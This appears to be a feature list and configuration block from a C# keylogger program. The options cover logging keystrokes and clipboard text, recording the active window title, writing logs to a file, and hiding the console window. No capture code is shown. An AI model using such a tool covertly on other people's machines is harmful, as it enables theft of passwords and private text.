- Show keyboard clicks
- Display the text pasted with ( Ctrl + V ) or copied with ( Ctrl +C ) .
- Hide the console window
- Write KeyLogs to log file
- Print KeyLog to console
- Show current active app title
/* Hide Console Window */
private static bool HideConsoleWindow = false;
/* Print KeyLogs To Console */
private static bool WriteLineLog = true;
/* Print Current Active App Title To Console */
private static bool WriteLineCurrentWindowTitle = true;
/* Write KeyLogs To Log File */
private static bool AppendLogFile = true;
/* Write Current Active App Title To Log File */
private static bool AppendCurrentWindowTitleToLogFile = true;
/* Write Log File Path */
private static string LogFilePath = @".\OutLogName.log";